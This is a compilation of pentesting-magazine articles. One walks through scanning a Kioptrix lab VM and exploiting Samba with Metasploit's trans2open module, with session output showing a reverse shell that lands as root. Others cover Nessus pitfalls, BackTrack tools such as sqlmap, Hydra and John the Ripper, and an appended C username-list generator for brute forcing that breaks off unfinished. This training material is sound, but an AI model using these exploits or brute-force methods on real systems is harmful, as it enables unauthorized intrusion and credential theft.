Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.02 seconds

StartKit 01/2013(01)
After identifying the TCP services exposed by the target, it is time to discover whether it exposes any UDP service. Differently from the TCP case, to identify whether or not a UDP port is open, nmap has to send active probes using requests pertinent to the specific service supposed to be resident on a certain port. This means that if a service is exposed on a non-standard port, or if the service does not recognize the requests made by the port scanner, nmap will report the port as open|filtered. This also means that it makes no sense to scan the whole UDP port range. The way I perform the UDP scan is shown in Listing 5.

Figure 2. Target Creation

A brief analysis of the port scan results shows us that the target has at least one outdated service, for example the Apache daemon listening on ports 80 and 443, and at least one security misconfiguration, since the ssh daemon listening on port 22 is configured to support version 1 of the protocol. It is furthermore possible to see in the results that the target exposes the NetBIOS protocol using the Samba daemon. Depending on the methodology, the port scan results are also useful for the risk evaluation. These results are the starting point for further analysis aimed at identifying vulnerabilities of the target.

Penetration Test Simulation:
Vulnerabilities Identification

The process of identifying the target's vulnerabilities can be simplified by using a vulnerability scanner. The vulnerability scanner which I use in this simulation is OpenVAS [10] and all the described actions are submitted to the engine through the web interface. Please refer to the manual to set up this vulnerability scanner properly. To start a scan you first have to define the target. This can be done through the menu "Configuration -> Targets" (Figure 2).
Listing 5. UDP ports/services enumeration
$ nmap -sU -P0 -O -n 192.168.1.105
Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-24 01:37 CEST
Nmap scan report for 192.168.1.105
Host is up (0.00035s latency).
Not shown: 996 closed ports
PORT      STATE         SERVICE
111/udp   open          rpcbind
137/udp   open          netbios-ns
138/udp   open|filtered netbios-dgm
32768/udp open|filtered omad
MAC Address: 08:00:27:A9:9E:29 (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1086.79 seconds

After the target creation I proceed with the scan. In order to start a vulnerability scan, you first have to create a task through the menu "Scan Management -> New Task" (see Figure 3) and then start the created task (see Figure 4). In a real world scenario you must also verify that the selected scanning policy does not contain any check that could cause a Denial of Service. In this test case, the default settings are enough. The vulnerability scan will take some time to complete, which means that this is a good moment for a coffee.
Analyzing the output of the vulnerability scan, it is possible to identify 69 security issues that require manual verification. At this point, for each identified vulnerability, it is necessary to check the listed references in order to spot any potentially exploitable service. Note that the results provided by OpenVAS are not complete: for example, the vulnerability scanner did not find any vulnerability affecting the Samba daemon. Beyond the specifics of this test case, the steps involved in identifying vulnerabilities are similar to the ones described in this example, even if you use a different scanner.
Another way to identify vulnerabilities is based on the banners exposed by the services enumerated during the port scan and on the information that can be obtained by inspecting the network traffic. Basically it is possible to find on the Internet publicly disclosed vulnerabilities for the services identified on the target. This method, when applied in a real scenario, could take a long time, particularly if you have to analyze a lot of targets. Anyway, it could be useful in some cases, especially when the vulnerability scanner fails to identify the vulnerabilities for you. To demonstrate this method I proceed with the analysis of the vulnerabilities related to the Samba daemon.
First of all it is necessary to generate some traffic directed to the Samba daemon. During the network scan I was able to identify the Samba workgroup name, MYGROUP, so I will try to connect to the daemon using an anonymous session while recording the network traffic with tcpdump. Listing 6 shows the rpcclient command line options which I use to connect to the Samba daemon.
As shown in Listing 6 the connection is successful. It is thus time to analyze the network traffic using Wireshark [11]. Using the display filter "frame contains Samba" it is possible to identify the version running on the target: Samba 2.2.1a. Figure 5 shows the captured packet that contains this juicy information. Using the cvedetails [12] website it is possible to look for any remotely exploitable vulnerability for Samba version 2.2.1a. In this case there is a vulnerability, CVE-2003-0201, that is remotely exploitable using a Metasploit module. Figure 6 shows the search results.

Penetration Test Simulation: Vulnerability
Exploitation

Exploiting the vulnerability is straightforward. Thanks to metasploit [13], it is possible with just a few commands to obtain remote privileged access on the target system. Listing 7 shows the metasploit session output.

Listing 6. rpcclient connection to samba daemon
$ rpcclient -I 192.168.1.105 -w MYGROUP -U "%"
rpcclient $>

Listing 7. metasploit session output
$ msfconsole
=[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1045 exploits - 589 auxiliary - 174 post
+ -- --=[ 274 payloads - 28 encoders - 8 nops
msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > show options
Module options (exploit/linux/samba/trans2open):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce

msf exploit(trans2open) > set RHOST 192.168.1.105
RHOST => 192.168.1.105
msf exploit(trans2open) > exploit
[*] Started reverse handler on 192.168.1.107:4444
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.1.107:4444 -> 192.168.1.105:32862) at 2013-04-24 05:56:25 +0200
id
uid=0(root) gid=0(root) groups=99(nobody)

Figure 3. Task Creation

Figure 4. Vulnerability Scan Start

Figure 5. SMB Packet containing samba daemon version information

Figure 6. CVE-2003-0201 vulnerability details

References

[1] BackTrack 5 R3 – http://www.backtrack-linux.org/downloads/
[2] Kioptrix VM Level 1 – http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar
[3] OSSTMM Methodology – http://www.isecom.org/mirror/OSSTMM.3.pdf
[4] ISSAF Methodology – http://www.oissg.org/files/issaf0.2.1.pdf
[5] OWASP Methodology – http://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf
[6] PuTTY – http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
[7] OpenSSH – http://www.openssh.org/
[8] Bash reference manual – http://www.gnu.org/software/bash/manual/bashref.html
[9] nmap – http://nmap.org/
[10] OpenVAS – http://www.openvas.org/
[11] Wireshark – http://www.wireshark.org/
[12] CVEDetails, samba related search results – http://www.cvedetails.com/vulnerability-list/vendor_id-102/product_id-171/version_id-9501/Samba-Samba-2.2.1a.html
[13] Metasploit framework – http://www.metasploit.com/
During a real penetration test you should verify whether all the identified vulnerabilities are exploitable or not. It is not sufficient to stop the penetration test at the first identified vulnerability. If the presented scenario were a real one, I should have also tested possible vulnerabilities affecting http, ssh and all the other identified services. Moreover, once you "breach" the security measures it is time to identify the relations between the vulnerable system and the other systems interacting with it.

Conclusion

What I tried to show you in this article is that, in order to become a professional penetration tester, you need to understand how to work to meet business and industry needs. This article quickly covers techniques and methodologies that are the subject of whole books; however, my goal is not to be exhaustive but to provide a starting point for approaching penetration testing as a profession.

Francesco Perna

A computer enthusiast since childhood, he has spent more than 15 years researching security issues related to applications and communication protocols, both from the offensive and the defensive point of view. He is a partner and technical director of Quantum Leap s.r.l., a company that offers security services to companies and organizations.
http://www.linkedin.com/in/francescoperna
[email protected], www.quantumleap.it

Cyber attacks are on the rise.

So, you think your systems
and networks are secure?
Think again – you’ve already been attacked and compromised.
And, we should know because we did it in less than four hours. Here’s the good news:
we’re the good guys. We can tell you what we did and how we did it, so you’ll be
prepared when the bad guys try it – and they will. We’ll show you how.

• Combat cyber attacks
• Ensure resilience
• Mitigate risk
• Improve operational efficiency

Visit www.KnowledgeCG.com to learn how KCG’s experienced, certified cybersecurity
professionals help our government and commercial customers protect their
cybersecurity programs by knowing the threat from the inside out.

Trusted Cyber Advisor

PENTESTING WITH TOOLS

Penetration Testing
with Nessus
The Continual Need for Trained Pentesters
In the last 10 years, cybersecurity has become a household word,
and due to the growth of critical infrastructure and an exponential
increase in the related threat of cyber-attack, dominates every
conversation we have about securing this critical infrastructure.

This has resulted in increased customer demand for services; a growing market for cybersecurity vendor products; and an expansion within higher education curriculums, including advanced degrees and certification programs within the cybersecurity field.
The president of the United States has declared
that the “cyber threat is one of the most serious economic and national security challenges we face as a
nation”, and that “America's economic prosperity in
the 21st century will depend on cybersecurity”. This
emphasis has significantly expanded investment in
cybersecurity, illustrated by the 2013 allocation of
$769 million to the Department of Homeland Security for its cybersecurity initiatives and the request by
the Department of Defense for $3.2 billion by 2015.
These expenditures on cybersecurity are part of a
projected $65.5 billion to be spent by the federal
government between 2013 and 2018.
Playing a critical role in this clearly growing industry is the penetration tester, also known as a pentester.
The pentester is an individual constantly staying abreast of the newest exploits, security flaws, and tricks-of-the-trade. This role has created a specialized niche within the cybersecurity realm and has become a vital part of any security program and security assessment.

According to the SANS Institute, penetration
testing is ranked as the second “coolest” job in
the industry. This enthusiasm has created a much
larger mainstream market flooded with tools for
the aspiring penetration tester. There are a significant number of both free and commercial penetration testing tools available on the market. The
most popular of these tools and the most widely used by penetration testers of every skill level
is the automated vulnerability scanner. There is
a common misconception that penetration testing is simply running an automated vulnerability
scanner and all the important vulnerabilities will
be magically highlighted for the tester as a result.
After that, it's a simple matter of determining the
false positives and exploiting the ones that are
valid. To better examine this theory, we will take a
look at one of the most popular vulnerability scanners currently in use today, Nessus® (Tenable
Network Security, Inc.).

Nessus Vulnerability Scanner

Nessus, a vulnerability scanner created by Tenable Network Security, exists primarily as either a free, non-commercial version for home use or a professional version (with paid licenses for each system it is used on). Version 5, the most recent version of Nessus, and version 4 are built on a server-client model, taking a built-in (and continually updated) series of more than 50,000 plug-ins (vulnerability and configuration checks) to determine any existing vulnerabilities or issues on a set of specified targets and ports. It makes use of an HTML5 web interface for the client piece that allows easy configuration of the scan and can be used with the same functionality on Linux® (Linus Torvalds), Windows® (Microsoft Corporation), OSX® (Apple Inc.), and mobile platforms. The server component runs the test and performs the actual vulnerability scan. It flags the high-risk findings with an ominous red color, moderate-risk issues with a cautionary orange, and the most common low-risk occurrences with a muted blue color (considered informational).
Each finding will not only have a rating and a fully
detailed description of the issue, but the tester can
also even check to see if an associated exploit exists, a corresponding common vulnerabilities and
exposures (CVE) identifier and BugTraq number, if
one exists, for the tester to read further about the
potential exploit. Nessus will go even further and
point out an exploit framework to use (Metasploit®
(Rapid7 LLC), Core Impact® (Core SDI, Inc.), Immunity CANVAS™ (Immunity, Inc.), etc.) if there is
one with a known workable exploit. Given this startling wealth of automated analysis and reporting provided to the aspiring cybersecurity professional, one could be led to think that the profession has become more of a point-and-click exercise to fill one more box on a security assessment checklist.
At the end of the day, the tester will have run
Nessus, used all the identified exploits that were
highlighted; employed all the default and null passwords that were provided to access a wide variety of services and devices; and even examined
the wealth of additional enumerated data that was
outlined by the detailed report, complete with color
priority codes, custom filters, and logically grouped
targets by IP address. At the conclusion of testing,
the tester wraps up, unplugging from the network,
and leaves confident, knowing that a thorough
penetration test was conducted. The customer
feels reassured by knowing that, at a minimum, all
the important high-level threats have been identified and no systems were harmed in the making of
this pentest. But that may not be the case...
What could possibly have been missed? Let's take a walk back through the above case and see where things could have been overlooked or gone askew.

Common Mistakes

Pre-game: Network mapping

Prior to running the Nessus tool, a penetration tester has to first determine the target list that will be
fed into the tool. What IP addresses are we scanning? Let's assume we ran the basic host discovery scan. Did we account for firewalls? Many starting testers will run a network discovery scan once
and faithfully record the IP addresses that were
discovered. Did we accurately identify the operating system (OS) in the hopes of reducing the number of plug-ins run during the vulnerability scanning phase?
Ideally, testers will use a network mapping tool
(Fyodor's Nmap and variants are a popular choice)
to better define the target space. Were all 65,535 ports examined? By default, Nmap does not scan every port. On one particular engagement, a high-level port (not found in the basic Nmap scan) contained a running Bean Shell. Bean Shell is an environment with dynamically interpreted Java® (Oracle America, Inc.) and scripting capability with powerful features, including a remotely accessible shell for debugging (or printing password hashes from the server it is running on; Figure 1).

Figure 1. Redacted image of displaying the contents of a shadow file with cat via Bean Shell's exec command

Main Event: Running Nessus

Rookie mistake? Maybe it would be easier to just skip any preliminary steps and use Nessus's built-in Transmission Control Protocol (TCP) scanner instead? Problem averted! Let's take a moment and see what else could go wrong.
Is your host-based firewall up? That could greatly interfere with the validity of your scan, even resulting in the loss of some of the probes intended for your target. Are you using a virtual machine (VM) and running more than one operating system at once? Are you using a Network Address Translation (NAT) configuration because the customer only had one usable IP address for you? Nessus, as far back as version 2, had known issues when run on a VM in NAT mode, even creating false negatives in some cases and causing vulnerabilities to be overlooked. Nessus clearly documents potential issues and has addressed many in later versions, but many beginning security analysts may consider Nessus to be relatively simple and overlook the importance of reading through the guide.
At this point, the tester may think, "We can have
the best of both worlds" and run Nmap functionality straight from Nessus. Nessus is configured to
run each plug-in against one host. A special plugin is used to call Nmap functionality. If 20 hosts are
scanned at once, 20 instances of Nmap will be run,
one against each host. This can quickly become a
resource nightmare.
One last consideration that can concern customers is whether safe checks are employed. Denial of service is one of those situations that no penetration tester ever wants to experience on a customer site, and the repercussions for it occurring due to negligence can be severe.

After Party: Reading Through Nessus Results

Assuming the previous steps were followed, the
tester has hopefully managed to avoid all of the pitfalls of setting up and running the Nessus scanner.
However, there's more to take into consideration. In a typical scenario, you have dutifully identified all the high-risk findings and some of the more interesting medium-risk findings, but you are on a tight schedule and focused on additional important priorities. Meanwhile, there remain hundreds of low-risk findings and "less interesting" medium-risk findings that may have been ignored in the interest of time.
There are names of potentially open file shares that are listed faithfully by Nessus, but they generally do not come with a screaming red SECURITY HOLE attached to herald their existence. This is when it becomes vitally important to make the effort of avoiding the common tendency of thinking that, just because a finding has low risk or "no risk" associated with it, it's worthless. Developers tend to be pressed on schedule, which results in the casual saving of files wherever it is quick and convenient to access them. Development teams may create temporary shares to more easily run tests and access other teammates' scripts. What's that? The labor-saving script that's sitting on the share has admin credentials? This not only saves the developer time and energy, but also the busy pentester (Figure 2).
A host can potentially have a startlingly large number of shares open to the public (including the dreaded C$ and Admin$) and still be listed with a risk factor of "none" (Figure 3).
Nessus also identifies many directory traversal
issues as a low- or medium-risk finding (though it
marks a number of others as high, depending on
the plug-in).

Figure 2. Redacted configuration file with perl script settings,
and database credentials accessible via unauthenticated web
access

Figure 3. A list of open server message block (SMB) shares
identified by Nessus

With directory traversal, one can pull configuration files, logs, /etc/passwd files (useful for determining user names) and a wealth of data from a target.
Maybe those lower, less flashy findings aren’t so
unimportant after all.
Even the more attractive findings produced
by Nessus can result in overlooked issues. You
look up the finding suggested by Nessus, and
you realize you are running the suggested exploit framework with all the most current plugins.
You triumphantly load up the exploit, set your
payload, and fire away. However, there is a mental checklist of questions you should have asked
yourself beforehand, even when dealing with
low-risk exploits.
• Did you check which port it was running on?
• Is it possible a firewall is blocking the return port selected (e.g., default 4444 on Metasploit), and you recorded the system as being "patched"?
• In haste, did you check the info data to see if a DoS was possible with the exploit you are running, due to the version of the OS running on the target system?

Conclusion

The questions and concerns that have been addressed throughout this article are not profound secrets to the Art of Penetration Testing. However, leaving such issues unaddressed results in many of the common mistakes for which novice and even some more experienced pentesters are known. Common mistakes happen for a large variety of reasons. Testers who do not have the necessary experience and training may tend to develop an overreliance on automated tools and accept on blind faith the settings configured out of the box and the data that results from them. Starting testers become so obsessed by the "high-risk" findings (much like a shiny, red, blinking button) that they tend to turn their noses up at the often-overlooked, lower-risk findings.
What many do not stop to realize is that developers and companies are running the same automated tools that pentesters use. Patching and protecting against remote exploits have increased. Vendors incorporate the newest safeguards into their software. Unless the customer is tragically bereft of any security know-how, odds are they not only run the same automated tools and scanners you do, but they also have even more expensive shiny tools that create better-looking reports. The true value of pentesters, which makes the profession continually stand apart in the cybersecurity industry, is their knowing how to properly use the tools that are available to them and an ability to manually analyze the security environment to see, in many cases, the gaps in security.
A pentester is able to look at custom, homegrown application code that does not have a published advisory and still thoroughly see the security issues in their entirety. Pentesters observe the application filters, security permissions, and firewall rules that often baffle automated tools and find ways around them. Much like a martial artist who learns how to punch, kick, and block will still take years of practicing and training before gaining a true level of proficiency, a pentester can learn a stepwise methodology, the syntax of a myriad of tools, and have bookmarks to every major security advisory site. It may still take years to turn the learning of a craft into an art form.

How to Become a More Proficient
Penetration Tester

Despite the numerous considerations to take into
account while testing, Nessus and other security
tools still remain highly useful. They are meant to
enhance or better facilitate a penetration test, but
are not used in place of one. There are some basic
principles that should be constantly in the mind of
every penetration tester.

Learn the Tools

Nessus alone has a wealth of other features (mobile device examination, payment card industry
(PCI) compliance, credentialed policy scans, and
even the ability to create custom Nessus® Attack
Scripting Language (Tenable Network Security,
Inc.) plug-ins) that cannot possibly be covered
in a short article. It has a user-friendly interface
and intuitive policy creation options. This does
not remove the need to learn what flaws or issues the tool may have (every tool has them) or
situations where another tool may be more useful. If one tool did it all, there would not be such
a huge market of penetration testing tools. Experimenting at home or within a test lab to learn
the quirks of any tool is highly advisable. Make
notes of what works well and strange behavior
so that others on your team do not have to learn
the hard way.

Understand the Networking

Many of the issues described dealt more with the configuration of your testing computer, the configuration of VMware® (VMware, Inc.), and the configuration of the customer's network perimeter. To use a network testing tool, knowledge of the network becomes vital. If Nessus or any other tools seem to be behaving oddly, start a network sniffer (e.g., Wireshark® (Wireshark Foundation, Inc.)) and see what the activity looks like. Are the connections being made appropriately? Where in the process did things break down? If the tester does not realize what is going on "under the hood," he or she may never realize what exactly is causing issues in the test.

Keep the Goal in Mind

It is important to keep the goal of your test in mind
(control the network, going after sensitive celebrity accounts, or preventing the system from declaring thermonuclear war). It differs from customer to
customer. Do they want a simple compliance scan
so they can point and say they remediated all the
"high-risk" findings? If the customer really wants
to know that their information is safe, it will help
for the tester to take the time to learn what they
most want to protect. Hunting after high-risk findings can be pointless if they were all on a development box that is on its own, segregated subnet,
unreachable by the rest of the network that will be
turned off next week. An open share that happens
to reside on a development version of the main
database server ultimately allows one to not only
compromise the database, but also the underlying
OS. This could easily lead to captured password
hashes and the compromise of several other servers on the network.

Learn the Customer

Each new test is a new experience; see how a particular network is deployed. Learn the standard procedures for each particular client. Many organizations have their own naming and coding conventions for their applications. Developers share source code. Passwords set by the help desk tend to follow the same patterns. Customize the test to fit the current target site.

Be Creative

Penetration testing largely involves thinking "outside the box." A tester is learning a series of rules and configurations and then methodically getting around them. Each new security measure and version of software means a new puzzle to unlock.
Learn from experience, share techniques, observe
forums, setup your own network and try out new
things.
Nessus has shown itself to be a versatile, powerful, and highly useful tool for the penetration tester.
However, like any of the other hundreds of existing
security tools, it does not in any way replace the
penetration tester. Instead, it helps make the process of testing smoother, faster, and often easier
so that the penetration tester is better able to do
the job.

Dan Robel, CISSP, GCIH, GPEN

Dan Robel is a senior cyber penetration testing specialist at SAIC. With over 10 years of information security experience, he serves as a penetration test team lead
and a course instructor for SAIC within the Washington,
D.C. area. He has guest lectured on cyber warfare at the
Air Force Institute of Technology. Robel offers his penetration test expertise as a “red team” member for SAIC’s
CyberNEXS, a patented cybersecurity training and exercise platform, during the Air Force Association’s CyberPatriot national high school cyber defense competition and the Maryland Cyber Challenge. Robel earned
a Bachelor of Science in business and computer science
from Mount Saint Mary’s and a Master of Science in
knowledge and information management with a concentration in information security from George Washington University. His master’s thesis "International CyberCrime Treaty" was adapted as an honors white paper
for the SANS Institute.


PENTESTING WITH TOOLS

BackTrack for
Pentesting?
There is always a major struggle between the open source camp
and the proprietary developed tool camp when it comes to the
value of software and the impact and usability it has. And when
it comes to security and testing software, these arguments are
repeated over and over again.

The fact however remains that the guys and girls who seek to penetrate your network are not picky. That can put them at an advantage when it comes to the vectors of attack they identify. If you or your company follows a specific philosophy when it comes to security, it is almost certain that the hacking world in general will also look at other exploits and methods of exploiting. For this, the saying often attributed to Einstein is to be taken literally: "If you invent something that is foolproof, the world will invent a better fool".
When it comes to open source tools, the internet is riddled with solutions for each and every thing you might want. And because of the nature of social and community developed software, the minds it sometimes attracts are the brightest the world has to offer. Thus, the quality of tool you can find is nothing short of "bleeding edge" and is usually the first when it comes to new ideas and philosophies.
But as with the bulk of open source tools you can find, the developer's focus is on the core of the problem, and the fringe modules receive little, if any, attention. This makes open source tools notoriously difficult to configure and get to perform "as advertised". Everything is possible for those select few with the inherent knowledge and skill to tinker. And even if there is a large community behind these tools, it is difficult for them to be deployed for business use outside the realm of tinkering. The type of person entering the world of pentesting is usually such a person. He/she/they know their way around computers, and compiling source from scratch to get a tool to work is not such a mountain to climb. But even for this class of individual, who is more than likely appointed on contract, it is sometimes not worth spending the time and effort to get something worthwhile configured. Especially if you need to earn your way in life, each hour spent on something that should be trivial (like installing a small piece of software) becomes a chore.
Enter the good folks at the project that produces BackTrack. The guys and girls of the BackTrack community spend their time getting all the most important tools running as a "ready to use"/"out of the box" solution. No longer does it take forever to hunt down the correct tool and get it to run in whatever environment you already have running. The task has become as easy as downloading the image and running it either in a virtual machine, live from a USB stick, or booted from the DVD. All the key tools are there. All you need to do is find the tool that suits your needs, and learn how to use it. And in most cases, there is more than one similar tool configured inside BackTrack, for your convenience.


Even though the purists among us will still prefer to configure and maintain their own implementation of the selected tools, BackTrack makes it
easy to get started, and should not in any way be
seen as sub par to bit for bit compiled and file for
file configured tools. Far from it! The mindset of
the hacker is not how pure your configuration is,
or who did the best job of configuring the tool that
will allow for the exploit of a system. As long as the
goal is achieved, the tool was worth using. And the
core focus of a professional pentester is to put him/
herself in the same mind as a hacker, and find the
vulnerabilities in servers and systems before anyone else does.
With the tool in hand, and the base understanding of what is required to be found, you can now set forth and start your testing on systems and applications.
Ethics plays a large role in distinguishing between hacker and pentester. The difference is not in skill, but in the way access to systems is disclosed. A hacker will do this as a sport; a cracker will do it for self gain (the two descriptions are different, but usually used interchangeably by the media and Hollywood), whereas a pentester will do all this above board, getting the permission of the company or person the test is done against before starting the process of information gathering and exploitation. And then also, at the end of it all, the pentester will disclose all exploits found, putting the focus squarely on assistance in the rectification of security issues, rather than maintaining access to these systems for future and personal use. It can be seen as a moral gray area, but trust and an internal ethical drive have to govern the pentester to do what is right. In short, pentesters are seen as white hat hackers with a piece of paper allowing them to hack.
If you don't know this already, hacking is taught in five stages when it comes to the education of pentesters. These stages are: (1) information gathering, (2) system scanning, (3) gaining access to a system, (4) maintaining access to the exploited system, and (5) covering your tracks, ensuring your actions go unnoticed. For each of these stages, BackTrack has a set of tools assisting you in getting the correct information to reach your goal.
Information gathering: Because cracking passwords and finding back doors into systems is a time consuming and sometimes impossible task, life for a hacker becomes much easier if he/she knows how a system works, and even more so if user-names and passwords are known. Gathering information like this (and sometimes striking gold in the sense of user-names and passwords) is what social engineering is all about. Rather work smart than too hard.
BackTrack is a fully functional operating system
with web browsers included. No need to search
Google from your primary OS, and then having to
write your notes before starting BackTrack, you
can do all the work from this environment.
For gathering technical information, BackTrack's Firefox browser has a number of add-ons installed to allow you to find information on the pages you browse. Scripts will be shown and you will be notified if something odd is used on the website you are looking at before you even start scanning.
As a further step BackTrack allows you to browse the site through a security proxy, which will passively analyse your target while you browse. This is ideal for investigating without alarms going off at the client's side while you are looking at the site or system in more detail than is initially disclosed. Note that passive analysis only inspects the requests and responses your own browsing already generates; those requests are still logged by the target like any other visit, but no extra probes are sent.
For this, look into Burp Suite and OWASP ZAP. Both run locally on BackTrack, allowing you to point your browser to them and browse the sites you need to investigate. On the application interface, you will find more information than you would ever believe is possible.
Scanning the system: The first technical step in hacking is to scan the target machine(s) to understand where the "attack" can be launched. Having a list of open ports will give you an idea of the services that are running. Corporates will very seldom run services on weird ports because of standardization and, in most cases, compatibility between different servers and systems.
The tool of choice here is NMAP. It is also seen as the industry standard, and a large number of tools, open source and proprietary, use it as a base to find the initial information on a system before deciding which vector of attack to try and exploit. NMAP is an active scanning tool, and if not used wisely will alert knowledgeable network and system administrators to your actions.
NMAP comes in many flavours and even a number of graphical user interfaces. The most common of these is Zenmap as installed on BackTrack. The features are the same, but are easy to access without learning the command line parameters for each of the features.
When deciding which vectors of attack will be used, NMAP (or its derivatives) will show you the open ports on the system. Each of these ports is a potential vector of attack. And for each of the tools/services running on these ports, BackTrack has a tool to exploit or investigate further.
The primary focus however for the pentester will be the website or web system running on the server. And depending on the mandate, the focus for information scanning will be on ports 80, 443 and 8080, the default ports for web servers to run on.
Tools such as theHarvester are used to check social media sites like LinkedIn and search engines for any email accounts linked to the domain you are trying to access. Results can be refined by putting result limits on the scan. A similar tool on BackTrack is Websecurify; its results will inform you of server versions that are being displayed. Removing the version numbers from being displayed will assist you in hardening the server against scans for versions by possible attackers (Figure 1 and Figure 2).
Another popular tool is Joomscan, which checks a web server for the version of Joomla installed and the various vulnerabilities associated with the plug-ins and modules installed on the website. The results are categorised into low, medium and high risk problems. Joomscan allows you to quickly identify the key problems in the site (Figure 3).

A vast majority of the attacks on domains however occur via SQL injection on the website. BackTrack comes with sqlmap installed. Scans done with sqlmap can be refined by telling it which operating system the back-end database runs on with the --os=linux option, as well as set to test for a specific type of database such as MySQL or MSSQL with the --dbms=mysql option. The --level of the scan can be raised to run a more intense set of tests if the initial scan does not reveal any errors (Figure 4 and Figure 5).

Figure 1. Websecurify Web-testing tool

Figure 2. Websecurify scan log output

Figure 3. Joomscan with Scan options

Figure 4. Sqlmap tool scan options
For every piece of software introduced to a system, bad code can open up the system for exploit. Web applications and websites are no exception. They are the primary focus for hackers because they are the most visible, and usually the part introduced on a server (be it Windows, Linux or any other UNIX environment) that is not tested for all eventualities before it goes live.
Web testing is made easy with BackTrack. An industry standard tool included is w3af (Web Application Attack and Audit Framework). This is not only a command line tool, but has a graphical interface as well, making the use of the system easy. The results are given in report format as well as in a usable interface form allowing the knowledgeable to run exploits directly from the GUI (Figure 6 and Figure 7).
Additional tools already included in BackTrack are WPScan and Joomscan, which are built specifically for the world's two most used content management systems: WordPress and Joomla!.
Identifying these systems and then running a scan is very easy using these tools. And because of the expandability of both these systems, old versions can be seen as very insecure, resulting in easily exploitable vulnerabilities.

Figure 5. Sqlmap example scan query

Figure 6. W3af graphical user interface startup screen

Figure 7. W3af OWASP_TOP10 Scan against domain.com
Exploiting the system to gain access: The sport
in hacking is to gain access to a system that you
target. All the information you have gathered will
assist you in achieving this ultimate goal. Sometimes it is as easy as using a found user-name and
password, and from there exploring and seeing if
you can escalate yourself to the highest level of
rights on a system. Sometimes none of the information you gathered is valid, and then it becomes
a technical game to see the hack through.
Once access to a system is gained, a number of things can be done. Defacing a website to make a political statement (in the realm of cracking) or leaving a hidden note for other hackers to find (the sport of hacking) may seem like the ultimate, but it is only the most visible side of Internet penetration and hacking. Hidden away from the public eye (databases or data encapsulated in confidential files) is where the elite hacker plays.
For this, the best-known automated tool is Metasploit. This tool is installed and ready to be used in BackTrack. BackTrack also includes a graphical interface to Metasploit called Armitage. Yet again, the command line options are represented via a mouse click interface, and make the scanning of multiple hosts easier than the time consuming typing of each host into the interface. The command line, however, is still available for those pesky exploits that need fine tuning.
Metasploit is a compilation of tools and scripts (especially scripts) for known exploits against different sets of software running on servers. This spans all commonly used server operating systems, and even includes exploits for desktop class operating systems.
The advantage of using Metasploit is that exploitation does not stay theory. If it can exploit a vulnerability, it will, and you get presented with a terminal to further your hack.
Metasploit is not the only exploitation tool included in BackTrack. For a number of specific products there are specific exploits targeting those systems only. Cisco is a major target, with the Cisco Global Exploiter already installed and configured on BackTrack, as are MySQL, MSSQL and Oracle tools. But for a pentester, the most important will be the sqlmap tool, allowing easy exploitation of SQL injection points found by w3af, WPScan and Joomscan.
Another angle of attack on web systems or servers is the all too well-publicized brute force attack. For this, tools like Hydra and its graphical interface, Hydra-GTK, exist (Figure 8 and Figure 9).
Figure 8. Hydra-GTK target settings

Figure 9. Hydra-GTK username and password setup

The art of brute force attacks is firstly in the user-names you have harvested in the first stage of your attacks. Not knowing what user-name to use is just as crippling as not having the password. A successful brute force usually results in a user-name and password combination, and is not just a focus on one of the two. If you can take one of these out of the equation, the time needed for the attack can be halved. Thus, find out how user-names are assigned if you can. Is it only first names, or is it last name and then the first letter of the first name? Or is it an email address? Which of these did you get while you gathered information?
Passwords and the use of passwords is an art all on its own. With the focus so squarely put on password strength by social networks, everyone is getting used to using a password that is not simply a dictionary word.
This makes life difficult, but not completely useless to try. Take a look at tools like John the Ripper as it is installed on BackTrack. For a good dictionary, scour Google for a word list in the language of the site you are targeting.
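The user-name conventions listed above are easy to turn into a generator, which is the usual way to build Hydra's login list (its -L file) from harvested names. The following C program is an added example written for this edition, not code from the article or from BackTrack. The person's names, the harvested address smithj and the other staff names are constructed sample data; the four conventions are the ones the text names (first name only, last name plus first initial, first initial plus last name, first.last). Given one known person and one user-name seen during information gathering, it works out which convention the target uses and applies it to everyone else:

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* The user-name conventions from the text, in the order candidates are tried. */
enum { CONV_FIRST, CONV_LAST_INITIAL, CONV_INITIAL_LAST, CONV_FIRST_DOT_LAST, CONV_COUNT };

/* Lower-case copy of src into dst, always NUL-terminated. */
static void lower_copy(char *dst, size_t n, const char *src) {
    size_t i;
    for (i = 0; i + 1 < n && src[i]; i++)
        dst[i] = (char)tolower((unsigned char)src[i]);
    dst[i] = '\0';
}

/* Render one person's name under one convention. Returns 0 on success, -1 on bad input. */
int make_username(int conv, const char *first, const char *last, char *out, size_t n) {
    char f[64], l[64];
    lower_copy(f, sizeof f, first);
    lower_copy(l, sizeof l, last);
    if (!f[0] || !l[0]) return -1;
    switch (conv) {
    case CONV_FIRST:          snprintf(out, n, "%s", f);         break; /* john       */
    case CONV_LAST_INITIAL:   snprintf(out, n, "%s%c", l, f[0]); break; /* smithj     */
    case CONV_INITIAL_LAST:   snprintf(out, n, "%c%s", f[0], l); break; /* jsmith     */
    case CONV_FIRST_DOT_LAST: snprintf(out, n, "%s.%s", f, l);   break; /* john.smith */
    default: return -1;
    }
    return 0;
}

/* Does convention conv turn first/last into expected? 1 if so, else 0. */
int username_is(int conv, const char *first, const char *last, const char *expected) {
    char buf[160];
    return make_username(conv, first, last, buf, sizeof buf) == 0 && strcmp(buf, expected) == 0;
}

/*
 * The information-gathering step: given one user-name seen for a known person
 * (e.g. the local part of a harvested e-mail address), find which convention the
 * target uses. Returns the convention, or -1 if none of them matches.
 */
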